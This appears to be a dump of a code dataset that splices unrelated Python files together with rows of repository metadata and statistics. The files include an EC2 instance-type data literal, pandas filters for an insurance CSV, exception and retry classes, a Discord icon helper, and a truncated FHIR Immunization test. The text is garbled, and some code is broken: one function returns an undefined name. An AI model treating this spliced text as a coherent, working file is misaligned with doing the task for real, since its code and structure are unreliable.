18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'SizeInMiB': 196608, 'EbsOptimizedSupport': 
'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.24xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': 
{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.24xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': 
{'SizeInMiB': 196608}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.24xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 
'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'SizeInMiB': 196608, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 
'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}] # noqa: E501
def get_instances_list() -> list:
    '''Return the hard-coded list of EC2 "c"-family instance-type descriptions.

    Each element is a dict with keys such as ``InstanceType``,
    ``ProcessorInfo``, ``VCpuInfo``, ``MemoryInfo``, ``NetworkInfo`` and
    ``PlacementGroupInfo``, mirroring the shape of the data literal above.
    '''
    # pylint: disable=all
    # NOTE(review): `get` is not defined anywhere in this view; presumably it
    # is the name of the module-level list literal defined above (the file
    # looks truncated here) -- confirm the name actually resolves at runtime.
    return get
| 9,982.166667 | 119,597 | 0.721887 | 9,998 | 119,786 | 8.637928 | 0.022605 | 0.003937 | 0.056738 | 0.066464 | 0.992995 | 0.992358 | 0.991929 | 0.986429 | 0.985306 | 0.961905 | 0 | 0.059655 | 0.080302 | 119,786 | 11 | 119,598 | 10,889.636364 | 0.724264 | 0.001052 | 0 | 0 | 1 | 0 | 0.653932 | 0.252587 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 12 |
51c8f608028976016618b183ff4902cd493b9653 | 9,224 | py | Python | analysis/Manya/scripts/project_functions.py | data301-2020-winter2/course-project-group_1021 | 10813b45eb7a967c610cd9f451928e0365710174 | [
"MIT"
] | null | null | null | analysis/Manya/scripts/project_functions.py | data301-2020-winter2/course-project-group_1021 | 10813b45eb7a967c610cd9f451928e0365710174 | [
"MIT"
] | null | null | null | analysis/Manya/scripts/project_functions.py | data301-2020-winter2/course-project-group_1021 | 10813b45eb7a967c610cd9f451928e0365710174 | [
"MIT"
] | null | null | null | import pandas as pd
def load(url_or_path_to_csv_file):
    """Load the medical-insurance CSV and rename columns to display names.

    Parameters
    ----------
    url_or_path_to_csv_file : str or file-like
        Anything accepted by ``pandas.read_csv``.

    Returns
    -------
    pandas.DataFrame
        The raw data with columns Age, Sex, BMI, Number of Children,
        Smoker, Place of Residence, Medical Insurance Charges.
    """
    # A single rename with a complete mapping replaces the original chain of
    # seven .rename() calls, each of which built an intermediate DataFrame.
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    return pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
def male_only(url_or_path_to_csv_file):
    """Load the insurance CSV and keep only the rows whose Sex is not female.

    Returns a DataFrame with display-named columns and a fresh 0..n-1 index.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    # Mirror the original "drop rows where Sex == 'female'" semantics.
    # reset_index(drop=True) replaces reset_index().drop(['index'], axis=1).
    return df[df["Sex"] != "female"].reset_index(drop=True)
def female_only(url_or_path_to_csv_file):
    """Load the insurance CSV and keep only the rows whose Sex is not male.

    Returns a DataFrame with display-named columns and a fresh 0..n-1 index.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    # Mirror the original "drop rows where Sex == 'male'" semantics.
    return df[df["Sex"] != "male"].reset_index(drop=True)
def smokers_only(url_or_path_to_csv_file):
    """Load the insurance CSV and keep only the rows whose Smoker is not 'no'.

    Returns a DataFrame with display-named columns and a fresh 0..n-1 index.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    # Mirror the original "drop rows where Smoker == 'no'" semantics.
    return df[df["Smoker"] != "no"].reset_index(drop=True)
def top50(url_or_path_to_csv_file):
    """Return the 50 rows with the highest Medical Insurance Charges.

    Columns are renamed to display names and the index is reset to 0..n-1.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    return (
        df.sort_values("Medical Insurance Charges", ascending=False)
        .head(50)
        .reset_index(drop=True)
    )
def top10(url_or_path_to_csv_file):
    """Return the 10 rows with the highest Medical Insurance Charges.

    Columns are renamed to display names and the index is reset to 0..n-1.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    return (
        df.sort_values("Medical Insurance Charges", ascending=False)
        .head(10)
        .reset_index(drop=True)
    )
def bot50(url_or_path_to_csv_file):
    """Return the 50 rows with the lowest Medical Insurance Charges.

    Columns are renamed to display names and the index is reset to 0..n-1.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    return (
        df.sort_values("Medical Insurance Charges", ascending=True)
        .head(50)
        .reset_index(drop=True)
    )
def bot10(url_or_path_to_csv_file):
    """Return the 10 rows with the lowest Medical Insurance Charges.

    Columns are renamed to display names and the index is reset to 0..n-1.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    return (
        df.sort_values("Medical Insurance Charges", ascending=True)
        .head(10)
        .reset_index(drop=True)
    )
def top30male(url_or_path_to_csv_file):
    """Return the 30 non-female rows with the highest insurance charges.

    Columns are renamed to display names and the index is reset to 0..n-1.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    # Sort first, then drop female rows -- same operation order as the
    # original, so tie handling is unchanged.
    ranked = df.sort_values("Medical Insurance Charges", ascending=False)
    ranked = ranked[ranked["Sex"] != "female"]
    return ranked.head(30).reset_index(drop=True)
def top30female(url_or_path_to_csv_file):
    """Return the 30 non-male rows with the highest insurance charges.

    Columns are renamed to display names and the index is reset to 0..n-1.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    # Sort first, then drop male rows -- same operation order as the original.
    ranked = df.sort_values("Medical Insurance Charges", ascending=False)
    ranked = ranked[ranked["Sex"] != "male"]
    return ranked.head(30).reset_index(drop=True)
def bot30male(url_or_path_to_csv_file):
    """Return the 30 non-female rows with the lowest insurance charges.

    Columns are renamed to display names and the index is reset to 0..n-1.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    # Sort first, then drop female rows -- same operation order as the
    # original.
    ranked = df.sort_values("Medical Insurance Charges", ascending=True)
    ranked = ranked[ranked["Sex"] != "female"]
    return ranked.head(30).reset_index(drop=True)
def bot30female(url_or_path_to_csv_file):
    """Return the 30 non-male rows with the lowest insurance charges.

    Columns are renamed to display names and the index is reset to 0..n-1.
    """
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    # Sort first, then drop male rows -- same operation order as the original.
    ranked = df.sort_values("Medical Insurance Charges", ascending=True)
    ranked = ranked[ranked["Sex"] != "male"]
    return ranked.head(30).reset_index(drop=True)
def theory_highest(url_or_path_to_csv_file):
    """Return the subset of rows theorized to have the highest charges.

    Keeps rows that are male, aged <= 55, with <= 2 children, smokers,
    living in the southeast, and with BMI >= 30, with columns renamed to
    display names and the index reset to 0..n-1.
    """
    # Rename everything up front with one complete mapping; the original
    # renamed five columns first and children/region after filtering, but
    # the resulting frame is identical.
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    mask = (
        (df["Sex"] == "male")
        & (df["Age"] <= 55)
        & (df["Number of Children"] <= 2)
        & (df["Smoker"] == "yes")
        & (df["Place of Residence"] == "southeast")
        & (df["BMI"] >= 30)
    )
    return df.loc[mask].reset_index(drop=True)
def theory_lowest(url_or_path_to_csv_file):
    """Return the subset of rows theorized to have the lowest charges.

    Keeps rows that are female, aged <= 25, with more than 2 children,
    non-smokers, living in the southwest, and with BMI <= 25, with columns
    renamed to display names and the index reset to 0..n-1.
    """
    # Rename everything up front with one complete mapping; the original
    # renamed five columns first and children/region after filtering, but
    # the resulting frame is identical.
    column_names = {
        "age": "Age", "sex": "Sex", "bmi": "BMI",
        "children": "Number of Children", "smoker": "Smoker",
        "region": "Place of Residence", "charges": "Medical Insurance Charges",
    }
    df = pd.read_csv(url_or_path_to_csv_file).rename(columns=column_names)
    mask = (
        (df["Sex"] == "female")
        & (df["Age"] <= 25)
        & (df["Number of Children"] > 2)
        & (df["Smoker"] == "no")
        & (df["Place of Residence"] == "southwest")
        & (df["BMI"] <= 25)
    )
    return df.loc[mask].reset_index(drop=True)
| 29.469649 | 71 | 0.539029 | 1,021 | 9,224 | 4.693438 | 0.066601 | 0.26586 | 0.052588 | 0.064274 | 0.953673 | 0.945743 | 0.943656 | 0.943239 | 0.943239 | 0.943239 | 0 | 0.012149 | 0.277212 | 9,224 | 312 | 72 | 29.564103 | 0.706615 | 0 | 0 | 0.791822 | 0 | 0 | 0.212056 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052045 | false | 0 | 0.003717 | 0 | 0.107807 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7a86094893730f5c8746957fa79a80a20e4be3be | 336 | py | Python | exception.py | windkeepblow/WeiboCrawler | e069da70345d422439c1422103e32df54cb68c3f | [
"MIT"
] | 5 | 2016-03-15T16:34:44.000Z | 2019-05-13T05:42:37.000Z | exception.py | windkeepblow/WeiboCrawler | e069da70345d422439c1422103e32df54cb68c3f | [
"MIT"
] | null | null | null | exception.py | windkeepblow/WeiboCrawler | e069da70345d422439c1422103e32df54cb68c3f | [
"MIT"
] | null | null | null | class CookieExpiredException(Exception):
def __init__(self, info):
Exception.__init__(self)
self.info = info
class WriteInfoException(Exception):
def __init__(self, info):
Exception.__init__(self)
self.info = info
class ParseInfoException(Exception):
def __init__(self, info):
Exception.__init__(self)
self.info = info
| 22.4 | 40 | 0.761905 | 39 | 336 | 5.948718 | 0.230769 | 0.206897 | 0.206897 | 0.258621 | 0.728448 | 0.728448 | 0.728448 | 0.728448 | 0.728448 | 0.728448 | 0 | 0 | 0.130952 | 336 | 14 | 41 | 24 | 0.794521 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
7aa83abd5ba72769228fc2b6fc2a4b441acfa9e0 | 1,190 | py | Python | qas/framework/retry_until.py | hatlonely/qas | c78dd549a3709802873a1710f05d92f0aa0bd098 | [
"Apache-2.0"
] | 2 | 2022-03-01T07:53:10.000Z | 2022-03-30T15:28:23.000Z | qas/framework/retry_until.py | hatlonely/qas | c78dd549a3709802873a1710f05d92f0aa0bd098 | [
"Apache-2.0"
] | null | null | null | qas/framework/retry_until.py | hatlonely/qas | c78dd549a3709802873a1710f05d92f0aa0bd098 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import datetime
import durationpy
from ..util import merge
class RetryError(Exception):
pass
class UntilError(Exception):
pass
class Retry:
attempts: int
delay: datetime.timedelta
condition: str
def __init__(self, args):
args = merge(args, {
"attempts": 1,
"delay": "1s",
"cond": "",
})
self.attempts = args["attempts"]
self.delay = durationpy.from_str(args["delay"])
self.condition = args["cond"]
def __repr__(self):
return "cond: [{}], attempts: {}, delay: {}".format(self.condition, self.attempts, durationpy.to_str(self.delay))
class Until:
attempts: int
delay: datetime.timedelta
condition: str
def __init__(self, args):
args = merge(args, {
"attempts": 1,
"delay": "1s",
"cond": "",
})
self.attempts = args["attempts"]
self.delay = durationpy.from_str(args["delay"])
self.condition = args["cond"]
def __repr__(self):
return "cond: [{}], attempts: {}, delay: {}".format(self.condition, self.attempts, durationpy.to_str(self.delay))
| 22.45283 | 121 | 0.57563 | 126 | 1,190 | 5.277778 | 0.269841 | 0.07218 | 0.054135 | 0.07218 | 0.78797 | 0.78797 | 0.78797 | 0.78797 | 0.78797 | 0.78797 | 0 | 0.005814 | 0.277311 | 1,190 | 52 | 122 | 22.884615 | 0.767442 | 0.017647 | 0 | 0.810811 | 0 | 0 | 0.121575 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0.054054 | 0.081081 | 0.054054 | 0.513514 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
8f8d2c79ec3a949f3f47fbae728d5d9e628628eb | 113 | py | Python | utils/guild_icon.py | ChrissisCodeXD/Hikari-TestProject | 236c8fc9081172d9edff6d629e5d11c5abe64205 | [
"MIT"
] | null | null | null | utils/guild_icon.py | ChrissisCodeXD/Hikari-TestProject | 236c8fc9081172d9edff6d629e5d11c5abe64205 | [
"MIT"
] | null | null | null | utils/guild_icon.py | ChrissisCodeXD/Hikari-TestProject | 236c8fc9081172d9edff6d629e5d11c5abe64205 | [
"MIT"
] | null | null | null | def guild_icon(guild):
return f"https://cdn.discordapp.com/icons/{guild.id}/{guild.icon_hash}.png?size=1024"
| 37.666667 | 89 | 0.734513 | 19 | 113 | 4.263158 | 0.789474 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038095 | 0.070796 | 113 | 2 | 90 | 56.5 | 0.733333 | 0 | 0 | 0 | 0 | 0.5 | 0.663717 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
8fe4c31a6ef1ca14198556b9508c9d3c115db15e | 148 | py | Python | icbd/type_analyzer/tests/imports0.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 7 | 2015-04-06T15:17:13.000Z | 2020-10-21T04:57:00.000Z | icbd/type_analyzer/tests/imports0.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | null | null | null | icbd/type_analyzer/tests/imports0.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 4 | 2016-05-16T17:53:08.000Z | 2020-11-28T17:18:50.000Z | import import_test.a as p
p # 0 module 'a'
import_test # e 0
import import_test
import_test # 0 module 'import_test'
import_test.a # 12 module 'a'
| 18.5 | 36 | 0.743243 | 29 | 148 | 3.586207 | 0.310345 | 0.576923 | 0.307692 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040984 | 0.175676 | 148 | 7 | 37 | 21.142857 | 0.811475 | 0.358108 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
890a89e40032d696a7430a29872ff6738968f5c8 | 21,975 | py | Python | fhir/resources/tests/test_immunization.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/tests/test_immunization.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/tests/test_immunization.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Immunization
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
import io
import json
import os
import unittest
import pytest
from .. import immunization
from ..fhirdate import FHIRDate
from .fixtures import force_bytes
@pytest.mark.usefixtures("base_settings")
class ImmunizationTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
js = json.load(handle)
self.assertEqual("Immunization", js["resourceType"])
return immunization.Immunization(js)
def testImmunization1(self):
inst = self.instantiate_from("immunization-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization1(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization1(inst2)
def implImmunization1(self, inst):
self.assertEqual(force_bytes(inst.doseQuantity.code), force_bytes("mg"))
self.assertEqual(
force_bytes(inst.doseQuantity.system),
force_bytes("http://unitsofmeasure.org"),
)
self.assertEqual(inst.doseQuantity.value, 5)
self.assertEqual(
force_bytes(inst.education[0].documentType),
force_bytes("253088698300010311120702"),
)
